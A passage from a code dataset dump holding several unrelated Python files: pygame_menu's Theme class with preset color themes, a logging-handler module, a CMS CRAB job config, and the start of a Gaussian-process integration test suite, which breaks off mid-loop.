TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n-------------------------------------------------------------------------------\n\"\"\"\n\nimport pygame_menu.font\nimport pygame_menu.utils as _utils\nimport pygame_menu.widgets as _widgets\nfrom pygame_menu.baseimage import BaseImage\n\nimport copy\nimport pygame\n\n\nclass Theme(object):\n \"\"\"\n Class defining the visual rendering of menus and widgets.\n\n .. note:: All colors must be defined with a tuple of 3 or 4 numbers in the formats:\n\n - (R,G,B)\n - (R,G,B,A)\n\n Red (R), Green (G) and Blue (B) must be numbers between 0 and 255.\n A means the alpha channel (opacity), if 0 the color is transparent, 100 means opaque.\n\n :param background_color: Menu background color\n :type background_color: tuple, list, :py:class:`pygame_menu.baseimage.BaseImage`\n :param cursor_color: Color of cursor\n :type cursor_color: tuple, list\n :param cursor_selection_color: Selection box color\n :type cursor_selection_color: tuple, list\n :param focus_background_color: Color of the widget focus, this must be a tuple of 4 elements. And must be transparent\n :type focus_background_color: tuple, list\n :param menubar_close_button: Draw a back-box button on header to close the menu\n :type menubar_close_button: bool\n :param scrollbar_color: Scrollbars color\n :type scrollbar_color: tuple, list\n :param scrollbar_shadow: Indicate if a shadow is drawn on each scrollbar\n :type scrollbar_shadow: bool\n :param scrollbar_shadow_color: Color of the shadow\n :type scrollbar_shadow_color: tuple, list\n :param scrollbar_shadow_offset: Offset of shadow\n :type scrollbar_shadow_offset: int, float\n :param scrollbar_shadow_position: Position of shadow\n :type scrollbar_shadow_position: str\n :param scrollbar_slider_color: Color of the sliders\n :type scrollbar_slider_color: tuple, list\n :param scrollbar_slider_pad: Space between slider and scrollbars borders\n :type scrollbar_slider_pad: int, float\n :param scrollbar_thick: Scrollbars thickness\n :type scrollbar_thick: int, float\n :param selection_color: Color of the selector widget\n :type selection_color: tuple, list\n :param surface_clear_color: Surface clear color before applying background function\n :type surface_clear_color: tuple, list\n :param title_background_color: Title background color\n :type title_background_color: tuple, list\n :param title_bar_style: Style of the title, use menubar widget styles\n :type title_bar_style: int\n :param title_font: Optional title font, if None use the Menu default font\n :type title_font: str, None\n :param title_font_antialias: Title font renders with antialiasing\n :type title_font_antialias: bool\n :param title_font_color: Title font color, if None use the widget font color\n :type title_font_color: tuple, list, None\n :param title_font_size: Font size of the title\n :type title_font_size: int\n :param title_offset: Offset (x-position,y-position) of title (px). Default (0,0)\n :type title_offset: tuple, list\n :param title_shadow: Enable shadow on title\n :type title_shadow: bool\n :param title_shadow_color: Title shadow color\n :type title_shadow_color: tuple, list\n :param title_shadow_offset: Offset of shadow on title\n :type title_shadow_offset: int, float\n :param title_shadow_position: Position of the shadow on title\n :type title_shadow_position: str\n :param widget_alignment: Widget default alignment\n :type widget_alignment: str\n :param widget_background_color: Background color of a widget\n :type widget_background_color: tuple, list, :py:class:`pygame_menu.baseimage.BaseImage`, None\n :param widget_font: Widget font path or name\n :type widget_font: str\n :param widget_font_antialias: Widget font renders with antialiasing\n :type widget_font_antialias: bool\n :param widget_font_background_color_from_menu: Use menu background color as font background color, True by default in pygame v2\n :type widget_font_background_color_from_menu: bool\n :param widget_font_color: Color of the font\n :type widget_font_color: tuple, list\n :param widget_font_size: Font size\n :type widget_font_size: int\n :param widget_margin: Horizontal and vertical margin of each element in Menu (px). Default (0, 10)\n :type widget_margin: tuple, list\n :param widget_offset: X,Y axis offset of widgets inside Menu (px). If value less than 1 use percentage of width/height. Default *(0, 0)*\n :type widget_offset: tuple, list\n :param widget_selection_effect: Widget selection effect object\n :type widget_selection_effect: :py:class:`pygame_menu.widgets.core.Selection`\n :param widget_shadow: Indicate if a shadow is drawn on each widget\n :type widget_shadow: bool\n :param widget_shadow_color: Color of the shadow\n :type widget_shadow_color: tuple, list\n :param widget_shadow_offset: Offset of shadow\n :type widget_shadow_offset: int, float\n :param widget_shadow_position: Position of shadow\n :type widget_shadow_position: str\n \"\"\"\n\n def __init__(self, **kwargs):\n self.background_color = self._get(kwargs, 'background_color',\n 'color_image', (220, 220, 220)) # type: tuple\n self.cursor_color = self._get(kwargs, 'cursor_color',\n 'color', (0, 0, 0)) # type: tuple\n self.cursor_selection_color = self._get(kwargs, 'cursor_selection_color',\n 'color', (30, 30, 30, 120)) # type: tuple\n self.focus_background_color = self._get(kwargs, 'focus_background_color',\n 'color', (0, 0, 0, 180)) # type: tuple\n self.menubar_close_button = self._get(kwargs, 'menubar_close_button',\n bool, True) # type: bool\n self.scrollbar_color = self._get(kwargs, 'scrollbar_color',\n 'color', (220, 220, 220)) # type: tuple\n self.scrollbar_shadow = self._get(kwargs, 'scrollbar_shadow',\n bool, False) # type: bool\n self.scrollbar_shadow_color = self._get(kwargs, 'scrollbar_shadow_color',\n 'color', (0, 0, 0)) # type: bool\n self.scrollbar_shadow_offset = self._get(kwargs, 'scrollbar_shadow_offset',\n (int, float), 2) # type: (int, float)\n self.scrollbar_shadow_position = self._get(kwargs, 'scrollbar_shadow_position',\n 'position', pygame_menu.locals.POSITION_NORTHWEST) # type: str\n self.scrollbar_slider_color = self._get(kwargs, 'scrollbar_slider_color',\n 'color', (200, 200, 200)) # type: tuple\n self.scrollbar_slider_pad = self._get(kwargs, 'scrollbar_slider_pad',\n (int, float), 0) # type: (int,float)\n self.scrollbar_thick = self._get(kwargs, 'scrollbar_thick',\n (int, float), 20) # type: (int,float)\n self.selection_color = self._get(kwargs, 'selection_color',\n 'color', (255, 255, 255)) # type: tuple\n self.surface_clear_color = self._get(kwargs, 'surface_clear_color',\n 'color', (0, 0, 0)) # type: tuple\n self.title_background_color = self._get(kwargs, 'title_background_color',\n 'color', (70, 70, 70)) # type: tuple\n self.title_bar_style = self._get(kwargs, 'title_bar_style',\n int, _widgets.MENUBAR_STYLE_ADAPTIVE) # type: int\n self.title_font = self._get(kwargs, 'title_font',\n str, pygame_menu.font.FONT_OPEN_SANS) # type: str\n self.title_font_antialias = self._get(kwargs, 'title_font_antialias',\n bool, True) # type: bool\n self.title_font_color = self._get(kwargs, 'title_font_color',\n 'color', (220, 220, 220)) # type: tuple\n self.title_font_size = self._get(kwargs, 'title_font_size',\n int, 40) # type: int\n self.title_offset = self._get(kwargs, 'title_offset',\n 'tuple2', (5, 0)) # type: tuple\n self.title_shadow = self._get(kwargs, 'title_shadow',\n bool, False) # type: bool\n self.title_shadow_color = self._get(kwargs, 'title_shadow_color',\n 'color', (0, 0, 0)) # type: tuple\n self.title_shadow_offset = self._get(kwargs, 'title_shadow_offset',\n (int, float), 2) # type: (int,float)\n self.title_shadow_position = self._get(kwargs, 'title_shadow_position',\n 'position', pygame_menu.locals.POSITION_NORTHWEST) # type: str\n self.widget_font = self._get(kwargs, 'widget_font',\n str, pygame_menu.font.FONT_OPEN_SANS) # type: str\n self.widget_alignment = self._get(kwargs, 'widget_alignment',\n 'alignment', pygame_menu.locals.ALIGN_CENTER) # type: str\n self.widget_background_color = self._get(kwargs, 'widget_background_color',\n 'color_image_none') # type: (tuple, type(None))\n self.widget_background_inflate = self._get(kwargs, 'background_inflate',\n 'tuple2', (16, 8)) # type: tuple\n self.widget_font_antialias = self._get(kwargs,\n 'widget_font_antialias',\n bool, True) # type: bool\n self.widget_font_background_color_from_menu = self._get(kwargs,\n 'widget_font_background_color_from_menu',\n bool, pygame.vernum.major == 2) # type: bool\n self.widget_font_color = self._get(kwargs, 'widget_font_color',\n 'color', (70, 70, 70)) # type: tuple\n self.widget_font_size = self._get(kwargs, 'widget_font_size',\n int, 30) # type: int\n self.widget_margin = self._get(kwargs, 'widget_margin',\n 'tuple2', (0, 10)) # type: tuple\n self.widget_offset = self._get(kwargs, 'widget_offset',\n 'tuple2', (0, 0)) # type: tuple\n self.widget_selection_effect = self._get(kwargs, 'widget_selection_effect',\n _widgets.core.Selection,\n _widgets.HighlightSelection()) # type: _widgets.core.Selection\n self.widget_shadow = self._get(kwargs, 'widget_shadow',\n bool, False) # type: bool\n self.widget_shadow_color = self._get(kwargs, 'widget_shadow_color',\n 'color', (0, 0, 0)) # type: tuple\n self.widget_shadow_offset = self._get(kwargs, 'widget_shadow_offset',\n (int, float), 2) # type: (int,float)\n self.widget_shadow_position = self._get(kwargs, 'widget_shadow_position',\n 'position', pygame_menu.locals.POSITION_NORTHWEST) # type: str\n\n # Upon this, no more kwargs should exist, raise exception if there's more\n for invalid_keyword in kwargs.keys():\n msg = 'parameter Theme.{} does not exist'.format(invalid_keyword)\n raise ValueError(msg)\n\n def validate(self):\n \"\"\"\n Validate the values of the theme. If there's a invalid parameter throws an\n AssertionError.\n\n This function also converts all lists to tuples. This is done because lists\n are mutable.\n\n :return: None\n \"\"\"\n\n # Size asserts\n assert self.scrollbar_thick > 0, 'scrollbar thickness must be greater than zero'\n assert self.scrollbar_shadow_offset > 0, 'scrollbar shadow offset must be greater than zero'\n assert self.title_font_size > 0, 'title font size must be greater than zero'\n assert self.widget_font_size > 0, 'widget font size must be greater than zero'\n assert self.widget_shadow_offset > 0, 'widget shadow offset must be greater than zero'\n assert self.widget_offset[0] >= 0 and self.widget_offset[1] >= 0, \\\n 'widget offset must be greater or equal than zero'\n\n # Format colors, this converts all color lists to tuples automatically\n self.background_color = self._format_opacity(self.background_color)\n self.cursor_color = self._format_opacity(self.cursor_color)\n self.cursor_selection_color = self._format_opacity(self.cursor_selection_color)\n self.focus_background_color = self._format_opacity(self.focus_background_color)\n self.scrollbar_color = self._format_opacity(self.scrollbar_color)\n self.scrollbar_shadow_color = self._format_opacity(self.scrollbar_shadow_color)\n self.scrollbar_slider_color = self._format_opacity(self.scrollbar_slider_color)\n self.selection_color = self._format_opacity(self.selection_color)\n self.surface_clear_color = self._format_opacity(self.surface_clear_color)\n self.title_background_color = self._format_opacity(self.title_background_color)\n self.title_font_color = self._format_opacity(self.title_font_color)\n self.title_shadow_color = self._format_opacity(self.title_shadow_color)\n self.widget_background_color = self._format_opacity(self.widget_background_color)\n self.widget_font_color = self._format_opacity(self.widget_font_color)\n\n # List to tuple\n self.title_offset = self._vec_2tuple(self.title_offset)\n self.widget_background_inflate = self._vec_2tuple(self.widget_background_inflate)\n self.widget_margin = self._vec_2tuple(self.widget_margin)\n self.widget_offset = self._vec_2tuple(self.widget_offset)\n\n # Configs\n self.widget_selection_effect.set_color(self.selection_color)\n\n # Color asserts\n assert self.focus_background_color[3] != 0, \\\n 'focus background color cannot be fully transparent, suggested opacity between 1 and 255'\n\n def set_background_color_opacity(self, opacity):\n \"\"\"\n Modify menu background color with given opacity.\n\n :param opacity: Opacity value, from 0 (transparent) to 1 (transparent)\n :type opacity: int\n :return: None\n \"\"\"\n assert isinstance(opacity, float)\n assert 0 <= opacity <= 1, 'Opacity must be a number between 0 (transparent) and 1 (opaque)'\n self.background_color = (self.background_color[0], self.background_color[1],\n self.background_color[2], int(opacity * 255))\n\n @staticmethod\n def _vec_2tuple(obj):\n \"\"\"\n Return a tuple from a list or tuple object.\n\n :param obj: Object\n :type obj: list, tuple\n :return: Tuple\n :rtype: tuple\n \"\"\"\n if isinstance(obj, tuple):\n return obj\n elif isinstance(obj, list):\n return obj[0], obj[1]\n else:\n raise ValueError('object is not a 2 vector')\n\n def copy(self):\n \"\"\"\n Creates a deep copy of the object.\n\n :return: Copied theme\n :rtype: Theme\n \"\"\"\n return copy.deepcopy(self)\n\n @staticmethod\n def _format_opacity(color):\n \"\"\"\n Adds opacity to a 3 channel color. (R,G,B) -> (R,G,B,A) if the color\n has not an alpha channel. Also updates the opacity to a number between\n 0 and 255.\n\n Color may be an Image, so if this is the case return the same object.\n If the color is a list, return a tuple.\n\n :param color: Color tuple\n :type color: tuple, list\n :return: Color in the same format\n :rtype: tuple, None\n \"\"\"\n if isinstance(color, BaseImage):\n return color\n if color is None:\n return color\n if isinstance(color, (tuple, list)):\n _utils.assert_color(color)\n if len(color) == 4:\n if isinstance(color, tuple):\n return color\n else:\n return color[0], color[1], color[2], color[3]\n elif len(color) == 3:\n color = color[0], color[1], color[2], 255\n else:\n raise ValueError('invalid color type {0}, only tuple or list are valid'.format(color))\n return color\n\n @staticmethod\n def _get(params, key, allowed_types=None, default=None):\n \"\"\"\n Return a value from a dictionary.\n\n :param params: parameters dictionary\n :type params: dict\n :param key: key to look for\n :type key: str\n :param allowed_types: list of allowed types\n :type allowed_types: any\n :param default: default value to return\n :type default: any\n :return: The value associated to the key\n :rtype: any\n \"\"\"\n if key not in params:\n return default\n\n value = params.pop(key)\n if allowed_types:\n if not isinstance(allowed_types, (tuple, list)):\n allowed_types = (allowed_types,)\n for valtype in allowed_types:\n if valtype == 'color':\n _utils.assert_color(value)\n elif valtype == 'color_none':\n if value is None:\n return value\n _utils.assert_color(value)\n elif valtype == 'color_image':\n if isinstance(value, BaseImage):\n return value\n _utils.assert_color(value)\n elif valtype == 'color_image_none':\n if value is None:\n return value\n elif isinstance(value, BaseImage):\n return value\n _utils.assert_color(value)\n elif valtype == 'position':\n _utils.assert_position(value)\n elif valtype == 'alignment':\n _utils.assert_alignment(value)\n elif valtype == 'tuple2':\n _utils.assert_vector2(value)\n\n all_types = ('color', 'color_none', 'color_image', 'color_image_none',\n 'position', 'alignment', 'tuple2')\n others = tuple(t for t in allowed_types if t not in all_types)\n if others:\n msg = 'Theme.{} type shall be in {} types (got {})'.format(key, others, type(value))\n assert isinstance(value, others), msg\n return value\n\n\nTHEME_DEFAULT = Theme()\n\nTHEME_DARK = Theme(\n background_color=(40, 41, 35),\n cursor_color=(255, 255, 255),\n cursor_selection_color=(80, 80, 80, 120),\n scrollbar_color=(39, 41, 42),\n scrollbar_slider_color=(65, 66, 67),\n selection_color=(255, 255, 255),\n title_background_color=(47, 48, 51),\n title_font_color=(215, 215, 215),\n widget_font_color=(200, 200, 200),\n)\n\nTHEME_BLUE = Theme(\n background_color=(228, 230, 246),\n scrollbar_shadow=True,\n scrollbar_slider_color=(150, 200, 230),\n scrollbar_slider_pad=2,\n scrollbar_thick=14,\n selection_color=(100, 62, 132),\n title_background_color=(62, 149, 195),\n title_font_color=(228, 230, 246),\n title_shadow=True,\n widget_font_color=(61, 170, 220),\n)\n\nTHEME_GREEN = Theme(\n background_color=(186, 214, 177),\n scrollbar_slider_color=(125, 121, 114),\n scrollbar_slider_pad=2,\n selection_color=(125, 121, 114),\n title_background_color=(125, 121, 114),\n title_font_color=(228, 230, 246),\n widget_font_color=(255, 255, 255),\n)\n\nTHEME_ORANGE = Theme(\n background_color=(228, 100, 36),\n selection_color=(255, 255, 255),\n title_background_color=(170, 65, 50),\n widget_font_color=(0, 0, 0),\n widget_font_size=30,\n)\n\nTHEME_SOLARIZED = Theme(\n background_color=(239, 231, 211),\n cursor_color=(0, 0, 0),\n cursor_selection_color=(146, 160, 160, 120),\n selection_color=(207, 62, 132),\n title_background_color=(4, 47, 58),\n title_font_color=(38, 158, 151),\n widget_font_color=(102, 122, 130),\n)\n","sub_path":"tetris/venv/Lib/site-packages/pygame_menu/themes.py","file_name":"themes.py","file_ext":"py","file_size_in_byte":22083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"9244936","text":"import sys\nimport os\nimport datetime\nimport logging\n\nfrom formatter import file_formatter, console_formatter\n\ndef attach_file_handler(logger: logging.Logger, logging_level: int) -> None:\n\n timestamp = datetime.datetime.utcnow().strftime(\"%Y%m%d\")\n PID = os.getpid()\n _logfile_path = f\"boto3_stream_server_log_{timestamp}.{logging.getLevelName(logging_level)}.log\"\n\n file_handler = logging.FileHandler(_logfile_path)\n file_handler.setFormatter(file_formatter)\n file_handler.setLevel(logging_level)\n\n logger.addHandler(file_handler)\n\ndef attach_console_handler(logger: logging.Logger, logging_level: int) -> None:\n\n console_stderr_handler = logging.StreamHandler(sys.stderr)\n console_stderr_handler.setFormatter(console_formatter)\n console_stderr_handler.setLevel(logging_level)\n \n logger.addHandler(console_stderr_handler)","sub_path":"src/logging/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"196354477","text":"from CRABClient.UserUtilities import config\nconfig = config()\n\nconfig.General.requestName = 'ElectronLooper_test'\nconfig.General.workArea = './'\nconfig.General.transferOutputs = True\nconfig.General.transferLogs = True\n\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = 'pset.py'\nconfig.JobType.scriptExe = 'crabWrapper.sh'\n#config.JobType.inputFiles = ['FrameworkJobReport.xml','ElectronLooper.exe', 'goodruns.txt', 'mc_small.txt', 'mc.txt', 'data.txt']\nconfig.JobType.inputFiles = [ 'mc_small.txt']\nconfig.JobType.outputFiles = ['ntuple.root']\n\nconfig.Data.userInputFiles = open('mc_small.txt').readlines()\nconfig.Data.outputPrimaryDataset = 'ElectronLooper_test'\nconfig.Data.splitting = 'FileBased'\nconfig.Data.unitsPerJob = 1\nconfig.Data.publication = False\nconfig.Data.outputDatasetTag = 'ElectronLooper_test'\n\nconfig.Site.storageSite = '/afs/cern.ch/work/d/diboye/essai/CMSSW_7_6_3/src/ElectronLooper/'\nconfig.Site.whitelist = ['T2_US_*']\n","sub_path":"crab.py","file_name":"crab.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"304698781","text":"import unittest\nfrom pyapprox.gaussian_process import *\nfrom sklearn.gaussian_process.kernels import Matern, WhiteKernel, RBF\nimport pyapprox as pya\nfrom scipy import stats\nfrom scipy.linalg import solve_triangular\nfrom scipy.spatial.distance import cdist\nimport copy\nimport time\n\n\ndef compute_mean_and_variance_of_gaussian_process(gp, length_scale,\n train_samples,\n A_inv, kernel_var,\n train_vals, quad_samples,\n quad_weights):\n # just use for testing purposes\n # computing variance_of_variance requires splitting up terms\n # like done in code so no point computing this quantity as it cannot\n # test if the splitting procedure is correct.\n nvars = quad_samples.shape[0]\n gp_vals, gp_std = gp(quad_samples, return_std=True)\n gp_vals = gp_vals[:, 0]\n mean_of_mean = gp_vals.dot(quad_weights)\n quad_samples_WWXX = pya.get_all_sample_combinations(\n quad_samples, quad_samples)\n quad_weights_WWXX = pya.outer_product([quad_weights]*2)\n\n L = np.linalg.cholesky(A_inv)\n\n ww, xx = quad_samples_WWXX[:nvars], quad_samples_WWXX[nvars:]\n dists_ww_xx = np.sum((ww.T/length_scale-xx.T/length_scale)**2, axis=1)\n dists_ww_tt = cdist(train_samples.T/length_scale, ww.T/length_scale,\n metric='sqeuclidean')\n dists_xx_tt = cdist(train_samples.T/length_scale, xx.T/length_scale,\n metric='sqeuclidean')\n t_ww = np.exp(-.5*dists_ww_tt)\n t_xx = np.exp(-.5*dists_xx_tt)\n prior_cov_ww_xx = kernel_var*np.exp(-.5*dists_ww_xx)\n post_cov_ww_xx = prior_cov_ww_xx - kernel_var*np.sum(\n t_ww.T.dot(L)*t_xx.T.dot(L), axis=1)\n\n variance_of_mean = post_cov_ww_xx.dot(quad_weights_WWXX)\n\n mean_of_variance = (gp_vals**2+gp_std**2).dot(quad_weights) - (\n variance_of_mean+mean_of_mean**2)\n\n return mean_of_mean, variance_of_mean, mean_of_variance\n\n\ndef compute_intermediate_quantities_with_monte_carlo(mu_scalar, sigma_scalar,\n length_scale,\n train_samples,\n A_inv, kernel_var,\n train_vals):\n nsamples_mc = 20000\n nvars = length_scale.shape[0]\n xx = np.random.normal(mu_scalar, sigma_scalar, (nvars, nsamples_mc))\n yy = np.random.normal(mu_scalar, sigma_scalar, (nvars, nsamples_mc))\n zz = np.random.normal(mu_scalar, sigma_scalar, (nvars, nsamples_mc))\n dists_xx_tt = cdist(train_samples.T/length_scale, xx.T/length_scale,\n metric='sqeuclidean')\n dists_yy_tt = cdist(train_samples.T/length_scale, yy.T/length_scale,\n metric='sqeuclidean')\n dists_zz_tt = cdist(train_samples.T/length_scale, zz.T/length_scale,\n metric='sqeuclidean')\n dists_xx_yy = np.sum((xx.T/length_scale-yy.T/length_scale)**2, axis=1)\n dists_xx_zz = np.sum((xx.T/length_scale-zz.T/length_scale)**2, axis=1)\n t_xx = np.exp(-.5*dists_xx_tt)\n t_yy = np.exp(-.5*dists_yy_tt)\n t_zz = np.exp(-.5*dists_zz_tt)\n\n mean_gp_xx = t_xx.T.dot(A_inv.dot(train_vals))*kernel_var\n mean_gp_yy = t_yy.T.dot(A_inv.dot(train_vals))*kernel_var\n prior_cov_xx_xx = np.ones((xx.shape[1]))\n L = np.linalg.cholesky(A_inv)\n post_cov_xx_xx = prior_cov_xx_xx - np.sum(\n (t_xx.T.dot(L))**2, axis=1)\n prior_cov_xx_yy = np.exp(-.5*dists_xx_yy)\n post_cov_xx_yy = prior_cov_xx_yy - np.sum(\n t_xx.T.dot(L)*t_yy.T.dot(L), axis=1)\n # assert np.allclose(np.sum(\n # t_xx.T.dot(L)*t_yy.T.dot(L),axis=1),np.diag(t_xx.T.dot(A_inv).dot(t_yy)))\n prior_cov_xx_zz = np.exp(-.5*dists_xx_zz)\n post_cov_xx_zz = prior_cov_xx_zz - np.sum(\n t_xx.T.dot(L)*t_zz.T.dot(L), axis=1)\n\n eta_mc = mean_gp_xx.mean()\n varrho_mc = (mean_gp_xx*post_cov_xx_yy).mean()\n phi_mc = (mean_gp_xx*mean_gp_yy*post_cov_xx_yy).mean()\n CC_mc = (post_cov_xx_yy*post_cov_xx_zz).mean()\n chi_mc = (post_cov_xx_yy**2).mean()\n M_sq_mc = (mean_gp_xx**2).mean()\n v_sq_mc = (post_cov_xx_xx).mean()\n varsigma_sq_mc = (post_cov_xx_yy).mean()\n P_mc = (t_xx.dot(t_xx.T))/xx.shape[1]\n lamda_mc = (prior_cov_xx_yy*t_yy).mean(axis=1)\n CC1_mc = (prior_cov_xx_yy*prior_cov_xx_zz).mean()\n Pi_mc = np.zeros((train_samples.shape[1], train_samples.shape[1]))\n for ii in range(train_samples.shape[1]):\n for jj in range(ii, train_samples.shape[1]):\n Pi_mc[ii, jj] = (prior_cov_xx_yy*t_xx[ii, :]*t_yy[jj, :]).mean()\n Pi_mc[jj, ii] = Pi_mc[ii, jj]\n\n return eta_mc, varrho_mc, phi_mc, CC_mc, chi_mc, M_sq_mc, v_sq_mc, \\\n varsigma_sq_mc, P_mc, lamda_mc, CC1_mc, Pi_mc\n\n\ndef verify_quantities(reference_quantities, quantities, tols):\n assert len(reference_quantities) == len(quantities) == len(tols)\n ii = 0\n for q_ref, q, tol in zip(reference_quantities, quantities, tols):\n assert np.allclose(q_ref, q, rtol=tol), (ii, q_ref, q, tol)\n ii += 1\n\n\nclass TestGaussianProcess(unittest.TestCase):\n def setUp(self):\n np.random.seed(1)\n\n def test_gaussian_process_pointwise_variance(self):\n nvars = 1\n lb, ub = 0, 1\n ntrain_samples = 5\n def func(x): return np.sum(x**2, axis=0)[:, np.newaxis]\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples)]*nvars)\n train_vals = func(train_samples)\n\n kernel = Matern(0.4, length_scale_bounds='fixed', nu=np.inf)\n kernel = ConstantKernel(\n constant_value=2., constant_value_bounds='fixed')*kernel\n kernel += WhiteKernel(noise_level=1e-5, noise_level_bounds='fixed')\n gp = GaussianProcess(kernel)\n\n gp.fit(train_samples, train_vals)\n\n samples = np.random.uniform(0, 1, (nvars, 100))\n pred_vals, stdev1 = gp(samples, return_std=True)\n\n variance2 = gaussian_process_pointwise_variance(\n kernel, samples, train_samples)\n\n assert np.allclose(stdev1**2, variance2)\n\n def test_integrate_gaussian_process_gaussian(self):\n\n nvars = 2\n def func(x): return np.sum(x**2, axis=0)[:, np.newaxis]\n\n mu_scalar, sigma_scalar = 3, 1\n # mu_scalar, sigma_scalar = 0, 1\n\n univariate_variables = [stats.norm(mu_scalar, sigma_scalar)]*nvars\n variable = pya.IndependentMultivariateRandomVariable(\n univariate_variables)\n\n lb, ub = univariate_variables[0].interval(0.99999)\n\n ntrain_samples = 5\n # ntrain_samples = 20\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples)]*nvars)\n train_vals = func(train_samples)\n\n nu = np.inf\n nvars = train_samples.shape[0]\n length_scale = np.array([1]*nvars)\n kernel = Matern(length_scale, length_scale_bounds=(1e-2, 10), nu=nu)\n # fix kernel variance\n kernel = ConstantKernel(\n constant_value=2., constant_value_bounds='fixed')*kernel\n # optimize kernel variance\n # kernel = ConstantKernel(\n # constant_value=3,constant_value_bounds=(0.1, 10))*kernel\n # optimize gp noise\n # kernel += WhiteKernel(noise_level_bounds=(1e-8, 1))\n # fix gp noise\n kernel += WhiteKernel(noise_level=1e-5, noise_level_bounds='fixed')\n # white kernel K(x_i,x_j) is only nonzeros when x_i=x_j, i.e.\n # it is not used when calling gp.predict\n gp = GaussianProcess(kernel, n_restarts_optimizer=10)\n gp.fit(train_samples, train_vals)\n # print(gp.kernel_)\n\n # xx=np.linspace(lb,ub,101)\n # plt.plot(xx,func(xx[np.newaxis,:]))\n # gp_mean,gp_std = gp(xx[np.newaxis,:],return_std=True)\n # gp_mean = gp_mean[:,0]\n # plt.plot(xx,gp_mean)\n # plt.plot(train_samples[0,:],train_vals[:,0],'o')\n # plt.fill_between(xx,gp_mean-2*gp_std,gp_mean+2*gp_std,alpha=0.5)\n # plt.show()\n\n import time\n t0 = time.time()\n expected_random_mean, variance_random_mean, expected_random_var,\\\n variance_random_var, intermediate_quantities =\\\n integrate_gaussian_process(gp, variable, return_full=True)\n print('time', time.time()-t0)\n\n # mu and sigma should match variable\n kernel_types = [Matern]\n kernel = extract_covariance_kernel(gp.kernel_, kernel_types)\n length_scale = np.atleast_1d(kernel.length_scale)\n constant_kernel = extract_covariance_kernel(\n gp.kernel_, [ConstantKernel])\n if constant_kernel is not None:\n kernel_var = constant_kernel.constant_value\n else:\n kernel_var = 1\n\n Kinv_y = gp.alpha_\n mu = np.array([mu_scalar]*nvars)[:, np.newaxis]\n sigma = np.array([sigma_scalar]*nvars)[:, np.newaxis]\n # Notes sq exp kernel is exp(-dists/delta). Sklearn RBF kernel is\n # exp(-.5*dists/L**2)\n delta = 2*length_scale[:, np.newaxis]**2\n\n # Kinv_y is inv(kernel_var*A).dot(y). Thus multiply by kernel_var to\n # get formula in notes\n Ainv_y = Kinv_y*kernel_var\n L_inv = solve_triangular(gp.L_.T, np.eye(gp.L_.shape[0]), lower=False)\n K_inv = L_inv.dot(L_inv.T)\n # K_inv is inv(kernel_var*A). Thus multiply by kernel_var to get A_inv\n A_inv = K_inv*kernel_var\n\n # Verify quantities used to compute mean and variance of mean of GP\n # This is redundant know but helped to isolate incorrect terms\n # when initialing writing tests\n tau_true = gaussian_tau(train_samples, delta, mu, sigma)\n u_true = gaussian_u(delta, sigma)\n varpi_true = compute_varpi(tau_true, A_inv)\n varsigma_sq_true = compute_varsigma_sq(u_true, varpi_true)\n verify_quantities(\n [tau_true, u_true, varpi_true, varsigma_sq_true],\n intermediate_quantities[:4], [1e-8]*4)\n\n # Verify mean and variance of mean of GP\n true_expected_random_mean = tau_true.dot(Ainv_y)\n true_variance_random_mean = variance_of_mean(\n kernel_var, varsigma_sq_true)\n assert np.allclose(\n true_expected_random_mean, expected_random_mean)\n # print(true_variance_random_mean,variance_random_mean)\n assert np.allclose(\n true_variance_random_mean, variance_random_mean)\n\n # Verify quantities used to compute mean of variance of GP\n # This is redundant know but helped to isolate incorrect terms\n # when initialing writing tests\n P_true = gaussian_P(train_samples, delta, mu, sigma)\n v_sq_true = compute_v_sq(A_inv, P_true)\n zeta_true = compute_zeta(train_vals, A_inv, P_true)\n verify_quantities(\n [P_true, v_sq_true], intermediate_quantities[4:6], [1e-8]*2)\n\n true_expected_random_var = mean_of_variance(\n zeta_true, v_sq_true, kernel_var, true_expected_random_mean,\n true_variance_random_mean)\n assert np.allclose(true_expected_random_var, expected_random_var)\n\n # Verify quantities used to compute variance of variance of GP\n # This is redundant know but helped to isolate incorrect terms\n # when initialing writing tests\n nu_true = gaussian_nu(delta, sigma)\n varphi_true = compute_varphi(A_inv, P_true)\n Pi_true = gaussian_Pi(train_samples, delta, mu, sigma)\n psi_true = compute_psi(A_inv, Pi_true)\n chi_true = compute_chi(nu_true, varphi_true, psi_true)\n phi_true = compute_phi(train_vals, A_inv, Pi_true, P_true)\n lamda_true = gaussian_lamda(train_samples, delta, mu, sigma)\n varrho_true = compute_varrho(\n lamda_true, A_inv, train_vals, P_true, tau_true)\n xi_1_true = gaussian_xi_1(delta, sigma)\n xi_true = compute_xi(xi_1_true, lamda_true, tau_true, P_true, A_inv)\n verify_quantities(\n [zeta_true, nu_true, varphi_true, Pi_true, psi_true, chi_true,\n phi_true, lamda_true, varrho_true, xi_1_true, xi_true],\n intermediate_quantities[6:17], [1e-8]*11)\n\n if nvars == 1:\n nxx = 100\n else:\n nxx = 15\n xx, ww = pya.gauss_hermite_pts_wts_1D(nxx)\n xx = xx*sigma_scalar + mu_scalar\n quad_points = pya.cartesian_product([xx]*nvars)\n quad_weights = pya.outer_product([ww]*nvars)\n mean_of_mean_quad, variance_of_mean_quad, mean_of_variance_quad = \\\n compute_mean_and_variance_of_gaussian_process(\n gp, length_scale, train_samples, A_inv, kernel_var, train_vals,\n quad_points, quad_weights)\n\n assert np.allclose(mean_of_mean_quad, expected_random_mean)\n assert np.allclose(variance_of_mean_quad, variance_random_mean)\n assert np.allclose(mean_of_variance_quad, expected_random_var)\n\n nsamples = 4000\n random_means, random_variances = [], []\n random_I2sq, random_I4, random_I2Isq = [], [], []\n xx, ww = pya.gauss_hermite_pts_wts_1D(nxx)\n xx = xx*sigma_scalar + mu_scalar\n quad_points = pya.cartesian_product([xx]*nvars)\n quad_weights = pya.outer_product([ww]*nvars)\n for ii in range(nsamples):\n vals 